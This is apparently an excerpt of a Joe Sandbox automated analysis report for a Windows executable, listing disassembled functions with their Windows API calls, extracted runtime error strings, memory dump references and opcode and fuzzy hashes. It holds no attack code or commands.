                                                                                                                                                                  • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                                                                                  • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                                                                  • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                                                                                  • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                                                                  Function 00418752 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 148fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00496872,00000104,00000001,004115F6,00000000), ref: 004187EE
                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,00000001,004115F6,00000000), ref: 004188A0
                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004188EC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                                                                                                  • String ID: ...$<program name unknown>$@hI$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $rhI
                                                                                                                                                                  • API String ID: 3784150691-1152812861
                                                                                                                                                                  • Opcode ID: f18df1d9ff86c0e07c706bd5a9d898f407085ae0612b91ff6468313bdf9516e4
                                                                                                                                                                  • Instruction ID: 113ef7f6135713692ed5abadedb2fb4a004c8e957f1eafa3cbe622dd24e59533
                                                                                                                                                                  • Opcode Fuzzy Hash: f18df1d9ff86c0e07c706bd5a9d898f407085ae0612b91ff6468313bdf9516e4
                                                                                                                                                                  • Instruction Fuzzy Hash: 08413672A002257ADB117779AC45BFF36EC9B05708F51447FF90492282EF2C8E8182AD
                                                                                                                                                                  Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                                                                  • GetParent.USER32 ref: 00469C98
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                                                                  • GetParent.USER32 ref: 00469CBC
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                                                                  • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                  • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                                                                  Function 00469DF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469E71
                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469E82
                                                                                                                                                                  • GetParent.USER32 ref: 00469E96
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111), ref: 00469E9D
                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469EA3
                                                                                                                                                                  • GetParent.USER32 ref: 00469EBA
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469EC1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                                                                  • Opcode ID: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                                                                  • Instruction ID: 3a0c9dd1fa5fd4c1d1a647422213a645dfa1e4764d365342f395b6f430504e68
                                                                                                                                                                  • Opcode Fuzzy Hash: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                                                                  • Instruction Fuzzy Hash: D121F7716001187BDB00ABA9CC85BBF77ACEB85310F00855FFA44EB2D5D6B8DC4587A5
                                                                                                                                                                  Function 00467C8E Relevance: 15.3, APIs: 10, Instructions: 310COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArraySafe$Data$Access$Unaccess$Vartype
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 707535999-0
                                                                                                                                                                  • Opcode ID: 90743f216a4550165bd7be12d2805f681158fdc82f8e1bd898076047334411b0
                                                                                                                                                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                                                                  • Opcode Fuzzy Hash: 90743f216a4550165bd7be12d2805f681158fdc82f8e1bd898076047334411b0
                                                                                                                                                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                                                                  Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                                                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                                                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                                                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 312131281-0
                                                                                                                                                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                                                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                                                                  Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                                                  • SendMessageW.USER32(75A705F0,00001001,00000000,?), ref: 00448E16
                                                                                                                                                                  • SendMessageW.USER32(75A705F0,00001026,00000000,?), ref: 00448E25
                                                                                                                                                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3771399671-0
                                                                                                                                                                  • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                  • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                                                                  • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                  • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                                                                  Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                                                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                                                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                                                  Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                  • API String ID: 0-1603158881
                                                                                                                                                                  • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                  • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                                                                  • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                  • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                                                                  Function 0045E737 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 163COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadString
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                  • API String ID: 2948472770-2354261254
                                                                                                                                                                  • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                                                                  • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                                                                  Function 0045E538 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadString
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                  • API String ID: 2948472770-8599901
                                                                                                                                                                  • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                                                                  • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                                                                  Function 0046081F Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadModuleString
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                                                                  • API String ID: 3590730445-2561132961
                                                                                                                                                                  • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                                                  • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                                                                  • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                                                  • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                                                                  Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateMenu.USER32 ref: 00448603
